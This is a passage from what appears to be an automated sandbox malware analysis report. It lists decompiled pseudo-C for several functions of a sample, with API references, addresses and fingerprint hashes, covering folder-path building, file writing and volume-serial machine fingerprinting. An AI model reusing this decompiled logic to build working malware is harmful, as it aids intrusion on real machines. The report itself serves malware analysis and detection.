					} while ( *((intOrPtr*)(_t319 - 0x254)) !=  *((intOrPtr*)(_t319 - 0x25c)));
				}
				E0040E49D(_t319 - 0x26c, _t295);
				E00404A66(_t319 - 0x134, 1, 0);
				E00404A66(_t319 + 0x10, 1, 0);
				E00404A66(_t319 + 0x2c, 1, 0);
				E00404A66(_t319 + 0x48, 1, 0);
				return E004236C3(_t319 - 0x26c, 1, 0);
			}

0x0040d114
0x0040d114
0x0040d114
0x0040d114
0x0040d11e
0x0040d126
0x0040d12e
0x0040d131
0x0040d13b
0x0040d141
0x0040d147
0x0040d14b
0x0040d14e
0x0040d154
0x0040d150
0x0040d150
0x0040d150
0x0040d15c
0x0040d16d
0x0040d178
0x0040d17f
0x0040d180
0x0040d183
0x0040d188
0x0040d18b
0x0040d191
0x0040d194
0x0040d19e
0x0040d1ab
0x0040d1bb
0x0040d1bf
0x0040d1c4
0x0040d1ca
0x0040d1d0
0x0040d1d6
0x0040d1dc
0x0040d1de
0x0040d1e4
0x0040d1f0
0x0040d202
0x0040d206
0x0040d213
0x0040d21a
0x0040d21e
0x0040d222
0x0040d233
0x0040d237
0x0040d23c
0x0040d248
0x0040d252
0x0040d258
0x0040d25e
0x0040d26c
0x0040d27a
0x0040d288
0x0040d28c
0x0040d29e
0x0040d2ab
0x0040d2b2
0x0040d2b6
0x0040d2ba
0x0040d2cb
0x0040d2cf
0x0040d2db
0x0040d2df
0x0040d2e8
0x0040d2ea
0x0040d2ea
0x0040d2ed
0x0040d2f6
0x0040d306
0x0040d306
0x0040d2f8
0x0040d2f8
0x0040d304
0x00000000
0x00000000
0x0040d304
0x0040d316
0x0040d326
0x0040d333
0x0040d340
0x0040d344
0x0040d34f
0x0040d351
0x0040d357
0x0040d35d
0x0040d363
0x0040d363
0x0040d376
0x0040d37b
0x0040d37e
0x0040d38b
0x0040d39d
0x0040d3af
0x0040d3c1
0x0040d3d3
0x0040d3e5
0x0040d3f7
0x0040d409
0x0040d417
0x0040d421
0x0040d424
0x0040d426
0x0040d426
0x0040d431
0x0040d43f
0x0040d452
0x0040d457
0x0040d45b
0x0040d45f
0x0040d461
0x0040d461
0x0040d46b
0x0040d479
0x0040d47d
0x0040d494
0x0040d4a0
0x0040d4a7
0x0040d4ab
0x0040d4b6
0x0040d4c4
0x0040d4c8
0x0040d4cd
0x0040d4d1
0x0040d4d5
0x0040d4d7
0x0040d4d7
0x0040d4da
0x0040d4e7
0x0040d4f4
0x0040d501
0x0040d505
0x0040d51c
0x0040d528
0x0040d52f
0x0040d533
0x0040d537
0x0040d54c
0x0040d550
0x0040d555
0x0040d55d
0x0040d55d
0x0040d570
0x0040d578
0x0040d57d
0x0040d588
0x0040d595
0x0040d5a2
0x0040d5af
0x0040d5b5
0x0040d5bd
0x0040d5c1
0x0040d5c6
0x0040d5d3
0x0040d1e4
0x0040d5e5
0x0040d5f7
0x0040d601
0x0040d60b
0x0040d615
0x0040d621

APIs

__EH_prolog3_GS.LIBCMT ref: 0040D11E
_strlen.LIBCMT ref: 0040D15F

Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000104,?,?,?,00408FFE,?,?), ref: 00417DCB
Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00408FFE,?,?,?,?,?,0040939F), ref: 00417DFC

GetFileAttributesW.KERNELBASE(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040D2ED
_memset.LIBCMT ref: 0040D376
lstrcat.KERNEL32(00000001,0043D134), ref: 0040D38B
lstrcat.KERNEL32(?,0043F55C), ref: 0040D39D
lstrcat.KERNEL32(?,0043F560), ref: 0040D3AF
lstrcat.KERNEL32(?,0043F564), ref: 0040D3C1
lstrcat.KERNEL32(?,0043F564), ref: 0040D3D3
lstrcat.KERNEL32(?,0043F568), ref: 0040D3E5
lstrcat.KERNEL32(?,0043F56C), ref: 0040D3F7
lstrcat.KERNEL32(?,0043F570), ref: 0040D409
lstrcat.KERNEL32(?,0043D134), ref: 0040D417
lstrcat.KERNEL32(?,?), ref: 0040D431
lstrcat.KERNEL32(?,0043D134), ref: 0040D43F
lstrcat.KERNEL32(00000000,00000000), ref: 0040D46B

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

Part of subcall function 00417D3E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,0043D130,?,?,?,?,?,0041743C,?), ref: 00417D61
Part of subcall function 00417D3E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,0041743C,?,?), ref: 00417D86

Part of subcall function 0040CF4F: __EH_prolog3.LIBCMT ref: 0040CF56

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$ByteCharMultiWide$AttributesFileH_prolog3H_prolog3__memmove_memset_strlen
String ID:
API String ID: 1460750578-0
Opcode ID: 9d44dab851fd9159d9f24cf20a326c802759ced11abc7e9945fbbaa6ea920e69
Instruction ID: 19b88a29a69248c59d2aad212cb97f6e4ab211776dee105c5186bf109d8ed0da
Opcode Fuzzy Hash: 9d44dab851fd9159d9f24cf20a326c802759ced11abc7e9945fbbaa6ea920e69
Instruction Fuzzy Hash: 39E16E7290525CAEDB20EBA4DC45BDE77B8AF85304F1040EAE509B7181DB785F88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00414500 Relevance: 22.7, APIs: 15, Instructions: 154
stringCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00414500(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t99;
				signed char _t100;
				intOrPtr _t123;
				intOrPtr _t125;
				intOrPtr _t132;
				void* _t135;

				_t123 = __edx;
				E00423679(E0043453B, __ebx, __edi, __esi);
				_t125 =  *0x447028; // 0x6ea8b8
				 *((intOrPtr*)(_t135 - 0x37c)) =  *((intOrPtr*)(_t135 + 8));
				 *((intOrPtr*)(_t135 - 0x374)) =  *((intOrPtr*)(_t135 + 0xc));
				 *(_t135 - 0x364) =  *(_t135 + 0x10);
				_t114 = 0;
				 *((intOrPtr*)(_t135 - 0x378)) =  *((intOrPtr*)(_t135 + 0x14));
				 *((intOrPtr*)(_t135 - 0x36c)) = 0;
				 *((intOrPtr*)(_t135 - 0x368)) = 0;
				E0041F6B0(_t135 - 0x220, 0, 0x104);
				E0041F6B0(_t135 - 0x328, 0, 0x104);
				 *0x4474e0(_t135 - 0x220, E004181BE(0, _t125, 0x104, 0x1a), 0x374);
				 *0x4474e0(_t135 - 0x220, _t125);
				 *0x4474e0(_t135 - 0x220,  *(_t135 - 0x364));
				_push( *0x447060);
				 *(_t135 - 0x370) = 0;
				_push( *(_t135 - 0x364));
				if( *0x447510() == 0) {
					 *(_t135 - 0x370) = 1;
				}
				_push( *0x446ac0);
				_push( *(_t135 - 0x364));
				if( *0x447510() == 0) {
					 *(_t135 - 0x370) = 2;
				}
				 *0x4474e0(_t135 - 0x328, E004181BE(_t114, _t125, 0x104, 0x1a));
				 *0x4474e0(_t135 - 0x328, _t125);
				E0041F6B0(_t135 - 0x118, _t114, 0x104);
				 *0x4474e0(_t135 - 0x118, _t135 - 0x220);
				 *0x4474e0(_t135 - 0x118, "\\");
				 *0x4474e0(_t135 - 0x118,  *0x446d14);
				E004049CF(_t135 - 0x344, _t135 - 0x118);
				 *(_t135 - 4) = _t114;
				_t99 = E00417DAA(_t135 - 0x344, _t135 - 0x360);
				if(_t99[0xa] >= 8) {
					_t99 =  *_t99;
				}
				_t100 = GetFileAttributesW(_t99); // executed
				if(_t100 == 0xffffffff) {
					L8:
					 *(_t135 - 0x364) = _t114;
					goto L9;
				} else {
					 *(_t135 - 0x364) = 1;
					if((_t100 & 0x00000010) == 0) {
						L9:
						_t131 = _t135 - 0x360;
						E0040CE40(0, _t135 - 0x360, 1);
						 *(_t135 - 4) =  *(_t135 - 4) | 0xffffffff;
						E00404A66(_t135 - 0x344, 1, _t114);
						_t146 =  *(_t135 - 0x364) - _t114;
						if( *(_t135 - 0x364) != _t114) {
							_push(_t135 - 0x368);
							_push(_t135 - 0x118);
							if(E0040F8E2(_t114, _t135 - 0x36c, 0, _t131, _t146) == 0) {
								E0040F848(_t135 - 0x36c, _t135 - 0x368);
							}
						}
						_t132 =  *((intOrPtr*)(_t135 - 0x37c));
						E00411603(_t132, _t123, 0x43d12c, _t135 - 0x220,  *((intOrPtr*)(_t135 - 0x374)),  *((intOrPtr*)(_t135 - 0x36c)),  *((intOrPtr*)(_t135 - 0x368)),  *((intOrPtr*)(_t132 + 0x20)),  *((intOrPtr*)(_t135 - 0x378))); // executed
						if( *((intOrPtr*)(_t132 + 6)) != _t114) {
							_t114 =  *(_t135 - 0x370);
							E00413B4B( *(_t135 - 0x370), _t132, _t135 - 0x328,  *((intOrPtr*)(_t135 - 0x374))); // executed
						}
						E0040F848(_t135 - 0x36c, _t135 - 0x368);
						return E004236C3(_t114, _t135 - 0x36c, _t135 - 0x368);
					}
					goto L8;
				}
			}

0x00414500
0x0041450a
0x00414512
0x00414518
0x00414521
0x0041452a
0x00414533
0x0041453b
0x00414549
0x0041454f
0x00414555
0x00414566
0x0041457e
0x0041458c
0x0041459f
0x004145a5
0x004145ab
0x004145b1
0x004145bf
0x004145c1
0x004145c1
0x004145cb
0x004145d1
0x004145df
0x004145e1
0x004145e1
0x004145fb
0x00414609
0x00414618
0x0041462e
0x00414640
0x00414653
0x00414666
0x00414678
0x0041467b
0x00414684
0x00414686
0x00414686
0x00414689
0x00414692
0x004146a2
0x004146a2
0x00000000
0x00414694
0x00414694
0x004146a0
0x004146a8
0x004146ac
0x004146b2
0x004146b7
0x004146c4
0x004146c9
0x004146cf
0x004146d7
0x004146de
0x004146ee
0x004146fc
0x004146fc
0x004146ee
0x00414707
0x00414730
0x00414738
0x00414740
0x0041474e
0x0041474e
0x0041475f
0x00414769
0x00414769
0x00000000
0x004146a0

APIs

__EH_prolog3_GS.LIBCMT ref: 0041450A
_memset.LIBCMT ref: 00414555
_memset.LIBCMT ref: 00414566

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 0041457E
lstrcat.KERNEL32(?,006EA8B8), ref: 0041458C
lstrcat.KERNEL32(?,?), ref: 0041459F
StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,?,00000000), ref: 004145B7
StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,?,00000000), ref: 004145D7
lstrcat.KERNEL32(?,00000000), ref: 004145FB
lstrcat.KERNEL32(?,006EA8B8), ref: 00414609
_memset.LIBCMT ref: 00414618
lstrcat.KERNEL32(?,?), ref: 0041462E
lstrcat.KERNEL32(?,0043D134), ref: 00414640
lstrcat.KERNEL32(?), ref: 00414653
GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00414689

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$AttributesFileFolderH_prolog3_Path
String ID:
API String ID: 1831167774-0
Opcode ID: edcbfef87bcecbbea26cc9735f6444b1705f60fa4b23df6d1fae7fd35161a026
Instruction ID: f39410809acfcfc13d664f4f078fd8cf947f0f361003a3f8191bf6b17874514d
Opcode Fuzzy Hash: edcbfef87bcecbbea26cc9735f6444b1705f60fa4b23df6d1fae7fd35161a026
Instruction Fuzzy Hash: 5C611CB6804228ABDF22DF60DC45ADA77BCFB09314F0045EAE519A2161DB35AF85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00408565 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 251
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408565(long* __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v275;
				char _v276;
				char _v540;
				struct _FILETIME _v560;
				struct _FILETIME _v568;
				struct _FILETIME _v576;
				unsigned int _v580;
				char _v844;
				char _v845;
				void* _v852;
				struct _OVERLAPPED* _v856;
				long _v860;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t83;
				long _t86;
				struct _OVERLAPPED* _t94;
				long _t97;
				long _t98;
				long _t102;
				long _t105;
				signed char _t109;
				signed int _t110;
				void* _t119;
				int _t132;
				long _t149;
				long _t151;
				void* _t157;
				long _t159;
				signed int _t163;

				_t157 = __edx;
				_t83 =  *0x444664; // 0xfa3a0753
				_v8 = _t83 ^ _t163;
				_t158 = __ecx;
				_v856 = __ecx;
				_v852 = _a8;
				if(_a16 == 3) {
					_t86 = __ecx[1];
					_t160 = _a4;
					__eflags = _t160 - _t86;
					if(_t160 == _t86) {
						L14:
						_t160 = E00407C18(_t158->Internal, _a12, _v852,  &_v845);
						__eflags = _t160;
						if(_t160 <= 0) {
							_t140 = _t158->Internal;
							E00407E46(_t158->Internal);
							_t23 =  &(_t158->InternalHigh);
							 *_t23 = _t158->InternalHigh | 0xffffffff;
							__eflags =  *_t23;
						}
						__eflags = _v845;
						if(_v845 == 0) {
							__eflags = _t160;
							if(_t160 <= 0) {
								__eflags = _t160 - 0xffffff96;
								_t94 = ((0 | _t160 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							} else {
								_t94 = 0x600;
							}
							goto L63;
						} else {
							L17:
							_t94 = 0;
							L63:
							return E0041F69E(_t94, _t140, _v8 ^ _t163, _t157, _t158, _t160);
						}
					}
					__eflags = _t86 - 0xffffffff;
					if(_t86 != 0xffffffff) {
						_t140 =  *__ecx;
						E00407E46( *__ecx);
					}
					_t97 = _t158->Internal;
					_t158->InternalHigh = _t158->InternalHigh | 0xffffffff;
					__eflags = _t160 -  *((intOrPtr*)(_t97 + 4));
					if(_t160 >=  *((intOrPtr*)(_t97 + 4))) {
						L3:
						_t94 = 0x10000;
						goto L63;
					}
					__eflags = _t160 -  *((intOrPtr*)(_t97 + 0x10));
					if(_t160 <  *((intOrPtr*)(_t97 + 0x10))) {
						E0040776B(_t97);
						_t160 = _a4;
					}
					_t98 = _t158->Internal;
					__eflags =  *((intOrPtr*)(_t98 + 0x10)) - _t160;
					if( *((intOrPtr*)(_t98 + 0x10)) >= _t160) {
						L13:
						E00407ABF(_t158->Internal,  *((intOrPtr*)(_t158 + 0x138))); // executed
						_t158->InternalHigh = _t160;
						goto L14;
					} else {
						do {
							E004077A0(_t158->Internal);
							_t102 = _t158->Internal;
							_t149 = _a4;
							__eflags =  *((intOrPtr*)(_t102 + 0x10)) - _t149;
						} while ( *((intOrPtr*)(_t102 + 0x10)) < _t149);
						_t160 = _t149;
						goto L13;
					}
				}
				if(_a16 == 2 || _a16 == 1) {
					__eflags = _t158->InternalHigh - 0xffffffff;
					if(_t158->InternalHigh != 0xffffffff) {
						E00407E46(_t158->Internal);
					}
					_t160 = _t158->Internal;
					_t140 = _a4;
					_t158->InternalHigh = _t158->InternalHigh | 0xffffffff;
					__eflags = _t140 -  *((intOrPtr*)(_t160 + 4));
					if(_t140 >=  *((intOrPtr*)(_t160 + 4))) {
						goto L3;
					} else {
						__eflags = _t140 -  *((intOrPtr*)(_t160 + 0x10));
						if(_t140 <  *((intOrPtr*)(_t160 + 0x10))) {
							E0040776B(_t160);
						}
						while(1) {
							_t105 = _t158->Internal;
							__eflags =  *((intOrPtr*)(_t105 + 0x10)) - _t140;
							if( *((intOrPtr*)(_t105 + 0x10)) >= _t140) {
								break;
							}
							_t160 = _t158->Internal;
							E004077A0(_t158->Internal);
						}
						_t140 = _v856;
						_t158 =  &_v844;
						E00407F35(_t140, _t157,  &_v844, _t140);
						_t109 = _v580 >> 4;
						__eflags = _t109 & 0x00000001;
						if((_t109 & 0x00000001) != 0) {
							goto L17;
						}
						__eflags = _a16 - 1;
						_v540 = 0;
						if(_a16 != 1) {
							_t160 = _v852;
							_t110 =  *_t160;
							_t159 = _t160;
							_t151 = _t160;
							while(1) {
								__eflags = _t110;
								if(_t110 == 0) {
									break;
								}
								__eflags = _t110 - 0x2f;
								if(_t110 == 0x2f) {
									L34:
									_t159 = _t151 + 1;
									L35:
									_t151 = _t151 + 1;
									__eflags = _t151;
									_t110 =  *_t151;
									continue;
								}
								__eflags = _t110 - 0x5c;
								if(_t110 != 0x5c) {
									goto L35;
								}
								goto L34;
							}
							E00420641( &_v276, _t160, 0x104);
							__eflags = _t159 - _t160;
							if(_t159 != _t160) {
								 *((char*)(_t163 + _t159 - _t160 - 0x110)) = 0;
								__eflags = _v276 - 0x2f;
								if(_v276 == 0x2f) {
									L47:
									wsprintfA( &_v540, "%s%s",  &_v276, _t159);
									L40:
									_t158 = 0;
									__eflags = 0;
									_t119 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
									L41:
									_v852 = _t119;
									__eflags = _t119 - 0xffffffff;
									if(_t119 != 0xffffffff) {
										E00407ABF( *_t140,  *((intOrPtr*)(_t140 + 0x138)));
										__eflags =  *(_t140 + 0x13c) - _t158;
										if(__eflags == 0) {
											 *(_t140 + 0x13c) = E0041EC5E(_t140, _t157, _t158, _t160, __eflags, 0x4000);
										}
										_v856 = _t158;
										while(1) {
											_t160 = E00407C18( *_t140, 0x4000,  *(_t140 + 0x13c),  &_v845);
											__eflags = _t160 - 0xffffff96;
											if(_t160 == 0xffffff96) {
												break;
											}
											__eflags = _t160 - _t158;
											if(__eflags < 0) {
												L57:
												_v856 = 0x5000000;
												L58:
												E00407E46(_t140);
												__eflags = _v856;
												if(_v856 == 0) {
													SetFileTime(_v852,  &_v568,  &_v576,  &_v560);
												}
												__eflags = _a16 - 1;
												if(_a16 != 1) {
													CloseHandle(_v852);
												}
												_t94 = _v856;
												goto L63;
											}
											if(__eflags <= 0) {
												L55:
												__eflags = _v845;
												if(_v845 != 0) {
													goto L58;
												}
												__eflags = _t160 - _t158;
												if(_t160 != _t158) {
													continue;
												}
												goto L57;
											}
											_t132 = WriteFile(_v852,  *(_t140 + 0x13c), _t160,  &_v860, _t158);
											__eflags = _t132;
											if(_t132 == 0) {
												_v856 = 0x400;
												goto L58;
											}
											goto L55;
										}
										_v856 = 0x1000;
										goto L58;
									}
									_t94 = 0x200;
									goto L63;
								}
								__eflags = _v276 - 0x5c;
								if(_v276 == 0x5c) {
									goto L47;
								}
								__eflags = _v276;
								if(_v276 == 0) {
									L39:
									wsprintfA( &_v540, "%s%s%s", _t140 + 0x140,  &_v276, _t159);
									goto L40;
								}
								__eflags = _v275 - 0x3a;
								if(_v275 != 0x3a) {
									goto L39;
								}
								goto L47;
							}
							_v276 = 0;
							goto L39;
						}
						_t119 = _v852;
						_t158 = 0;
						goto L41;
					}
				} else {
					goto L3;
				}
			}

0x00408565
0x0040856e
0x00408575
0x00408582
0x00408584
0x0040858a
0x00408590
0x004085b0
0x004085b3
0x004085b6
0x004085b8
0x0040860b
0x00408622
0x00408626
0x00408628
0x0040862a
0x0040862c
0x00408631
0x00408631
0x00408631
0x00408631
0x00408635
0x0040863c
0x00408645
0x00408647
0x00408655
0x00408661
0x00408649
0x00408649
0x00408649
0x00000000
0x0040863e
0x0040863e
0x0040863e
0x004088a9
0x004088b7
0x004088b7
0x0040863c
0x004085ba
0x004085bd
0x004085bf
0x004085c1
0x004085c1
0x004085c6
0x004085c8
0x004085cc
0x004085cf
0x004085a6
0x004085a6
0x00000000
0x004085a6
0x004085d1
0x004085d4
0x004085d8
0x004085dd
0x004085dd
0x004085e0
0x004085e2
0x004085e5
0x004085fa
0x00408602
0x00408608
0x00000000
0x004085e7
0x004085e7
0x004085e9
0x004085ee
0x004085f0
0x004085f3
0x004085f3
0x004085f8
0x00000000
0x004085f8
0x004085e5
0x00408596
0x0040866b
0x0040866f
0x00408673
0x00408673
0x00408678
0x0040867a
0x0040867d
0x00408681
0x00408684
0x00000000
0x0040868a
0x0040868a
0x0040868d
0x0040868f
0x0040868f
0x0040869d
0x0040869d
0x0040869f
0x004086a2
0x00000000
0x00000000
0x00408696
0x00408698
0x00408698
0x004086a5
0x004086ab
0x004086b3
0x004086be
0x004086c1
0x004086c3
0x00000000
0x00000000
0x004086c9
0x004086cd
0x004086d4
0x004086e3
0x004086e9
0x004086eb
0x004086ed
0x004086ff
0x004086ff
0x00408701
0x00000000
0x00000000
0x004086f1
0x004086f3
0x004086f9
0x004086f9
0x004086fc
0x004086fc
0x004086fc
0x004086fd
0x00000000
0x004086fd
0x004086f5
0x004086f7
0x00000000
0x00000000
0x00000000
0x004086f7
0x00408710
0x00408718
0x0040871a
0x0040877f
0x00408787
0x0040878e
0x004087af
0x004087c3
0x00408747
0x00408747
0x00408747
0x00408760
0x00408766
0x00408766
0x0040876c
0x0040876f
0x004087d9
0x004087df
0x004087e5
0x004087f2
0x004087f2
0x004087f8
0x004087fe
0x00408817
0x0040881b
0x0040881e
0x00000000
0x00000000
0x00408824
0x00408826
0x00408856
0x00408856
0x00408860
0x00408862
0x00408867
0x0040886e
0x0040888b
0x0040888b
0x00408891
0x00408895
0x0040889d
0x0040889d
0x004088a3
0x00000000
0x004088a3
0x00408828
0x00408849
0x00408849
0x00408850
0x00000000
0x00000000
0x00408852
0x00408854
0x00000000
0x00000000
0x00000000
0x00408854
0x0040883f
0x00408845
0x00408847
0x004088c6
0x00000000
0x004088c6
0x00000000
0x00408847
0x004088ba
0x00000000
0x004088ba
0x00408771
0x00000000
0x00408771
0x00408790
0x00408797
0x00000000
0x00000000
0x00408799
0x004087a0
0x00408723
0x0040873e
0x00000000
0x00408744
0x004087a2
0x004087a9
0x00000000
0x00000000
0x00000000
0x004087a9
0x0040871c
0x00000000
0x0040871c
0x004086d6
0x004086dc
0x00000000
0x004086dc
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00408710
wsprintfA.USER32 ref: 0040873E
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000), ref: 00408760
wsprintfA.USER32 ref: 004087C3
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040883F
SetFileTime.KERNEL32(?,?,?,?), ref: 0040888B
CloseHandle.KERNEL32(?), ref: 0040889D

Strings

%s%s%s, xrefs: 00408738
:, xrefs: 004087A2
\, xrefs: 00408790
%s%s, xrefs: 004087BD

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite__fassign
String ID: %s%s$%s%s%s$:$\
API String ID: 3651047468-1100577047
Opcode ID: f8177f3f80389a23b7e8c3859c9f1ab9dc0996d14fef8df361531485c0bedb70
Instruction ID: 334c4cbb4e23a39ed010decdee32836c89718cbacb8bb5ed029a6dbd3cbb9714
Opcode Fuzzy Hash: f8177f3f80389a23b7e8c3859c9f1ab9dc0996d14fef8df361531485c0bedb70
Instruction Fuzzy Hash: 8DA1B0318046189FDB259F24CE84BDA77B4AB05314F1405BFE898B72D1CB39AE85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00416A49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00416A49(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t69;
				signed int _t71;
				long _t73;
				char _t82;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t89;
				long _t105;
				void* _t107;
				void* _t124;
				char* _t126;
				char _t127;
				char _t134;
				void* _t142;

				_push(0x1dc);
				E00423679(E00433656, __ebx, __edi, __esi);
				_t105 = 0;
				 *(_t142 - 0x1e4) = 0;
				_t126 = __ecx;
				 *((intOrPtr*)(_t142 - 0x1e8)) = __ecx;
				 *(_t142 - 0x1e4) = 0;
				 *((intOrPtr*)(_t142 - 0x120)) = 0xf;
				 *((intOrPtr*)(_t142 - 0x124)) = 0;
				 *(_t142 - 0x134) = 0;
				 *((intOrPtr*)(_t142 - 4)) = 0;
				if(GetWindowsDirectoryA(_t142 - 0x118, 0x104) == 0) {
					 *(_t142 - 0x118) = 0x43;
				}
				 *(_t142 - 0x1e0) =  *(_t142 - 0x118);
				 *((short*)(_t142 - 0x1df)) = 0x5c3a;
				 *(_t142 - 0x1dd) = _t105;
				GetVolumeInformationA(_t142 - 0x1e0, _t105, _t105, _t142 - 0x1e4, _t105, _t105, _t105, _t105); // executed
				_t69 =  *(_t142 - 0x1e4) * 0x14a30b - 0x69427551;
				 *(_t142 - 0x144) = _t69;
				_t71 = _t69 * 0x14a30b - 0x69427551;
				 *(_t142 - 0x140) = _t71;
				_t73 = _t71 * 0x14a30b - 0x69427551;
				_t124 = 0;
				do {
					_t73 = _t73 * 0x14a30b - 0x69427551;
					 *(_t142 + _t124 - 0x13c) = _t73;
					_t124 = _t124 + 1;
				} while (_t124 < 8);
				 *(_t142 - 0x1e4) = _t73;
				_t133 = HeapAlloc(GetProcessHeap(), _t105, 0x104);
				if(_t133 != _t105) {
					wsprintfA(_t133, "%08lX%04lX%lu-",  *(_t142 - 0x144),  *(_t142 - 0x140) & 0x0000ffff,  *((intOrPtr*)(_t142 - 0x13a)));
					E0040CFD5(_t142 - 0x134, E004201E0(_t133), __eflags, _t133);
					__eflags =  *((intOrPtr*)(_t142 - 0x120)) - 0x10;
					_t134 =  *(_t142 - 0x134);
					_t127 = _t134;
					if( *((intOrPtr*)(_t142 - 0x120)) >= 0x10) {
						_t82 = _t134;
					} else {
						_t127 = _t142 - 0x134;
						_t82 = _t127;
					}
					__eflags =  *((intOrPtr*)(_t142 - 0x120)) - 0x10;
					_t111 =  *((intOrPtr*)(_t142 - 0x124));
					_t107 = _t82 +  *((intOrPtr*)(_t142 - 0x124));
					if( *((intOrPtr*)(_t142 - 0x120)) < 0x10) {
						_t134 = _t142 - 0x134;
					}
					__eflags = _t134 - _t107;
					if(_t134 != _t107) {
						_t127 = _t127 - _t134;
						__eflags = _t127;
						do {
							 *((char*)(_t127 + _t134)) = E00422ED6( *_t134 & 0x000000ff);
							_t134 = _t134 + 1;
							_pop(_t111);
							__eflags = _t134 - _t107;
						} while (_t134 != _t107);
					}
					_t83 = E004171BF(_t107, _t124, _t127, _t142 - 0x1c0); // executed
					 *((char*)(_t142 - 4)) = 1;
					_t128 = E0040CD3B(_t111, _t142 - 0x1dc, _t83, 0x14, 0x11);
					 *((char*)(_t142 - 4)) = 2;
					_t85 = E00417207(_t124, _t84, _t142 - 0x188); // executed
					 *((char*)(_t142 - 4)) = 3;
					_t86 = E0040CD3B(_t111, _t142 - 0x1a4, _t85, 0, 0x18);
					_t108 = _t142 - 0x134;
					 *((char*)(_t142 - 4)) = 4;
					_t87 = E00417866(_t86, _t142 - 0x134, _t86, _t128, _t142 - 0x16c);
					 *((char*)(_t142 - 4)) = 5;
					_t89 = E00404DE3(_t128, _t87, _t142 - 0x150);
					 *((char*)(_t142 - 4)) = 6;
					E00404A22(_t108, _t89);
					_t105 = 0;
					__eflags = 1;
					E00404A66(_t142 - 0x150, 1, 0);
					E00404A66(_t142 - 0x16c, 1, 0);
					E00404A66(_t142 - 0x1a4, 1, 0);
					E00404A66(_t142 - 0x188, 1, 0);
					E00404A66(_t142 - 0x1dc, 1, 0);
					 *((char*)(_t142 - 4)) = 0;
					E00404A66(_t142 - 0x1c0, 1, 0);
					_t126 =  *((intOrPtr*)(_t142 - 0x1e8));
					 *((intOrPtr*)(_t126 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t126 + 0x10)) = 0;
					_t133 = _t142 - 0x134;
					 *_t126 = 0;
					E00404A22(_t126, _t142 - 0x134);
				} else {
					E004049CF(_t126, _t105);
				}
				E00404A66(_t142 - 0x134, 1, _t105);
				return E004236C3(_t105, _t126, _t133);
			}

0x00416a49
0x00416a53
0x00416a58
0x00416a5a
0x00416a60
0x00416a62
0x00416a68
0x00416a6e
0x00416a78
0x00416a7e
0x00416a91
0x00416a9c
0x00416a9e
0x00416a9e
0x00416aaf
0x00416ac5
0x00416ace
0x00416ad4
0x00416aeb
0x00416aed
0x00416af9
0x00416afb
0x00416b08
0x00416b0a
0x00416b0c
0x00416b12
0x00416b14
0x00416b1b
0x00416b1c
0x00416b23
0x00416b36
0x00416b3a
0x00416b63
0x00416b7b
0x00416b80
0x00416b87
0x00416b8d
0x00416b8f
0x00416cd3
0x00416b95
0x00416b95
0x00416b9b
0x00416b9b
0x00416b9d
0x00416ba4
0x00416baa
0x00416bad
0x00416baf
0x00416baf
0x00416bb5
0x00416bb7
0x00416bb9
0x00416bb9
0x00416bbb
0x00416bc4
0x00416bc7
0x00416bc8
0x00416bc9
0x00416bc9
0x00416bbb
0x00416bd3
0x00416be3
0x00416bec
0x00416bf4
0x00416bf8
0x00416c08
0x00416c0c
0x00416c1a
0x00416c20
0x00416c24
0x00416c34
0x00416c38
0x00416c41
0x00416c45
0x00416c4a
0x00416c4f
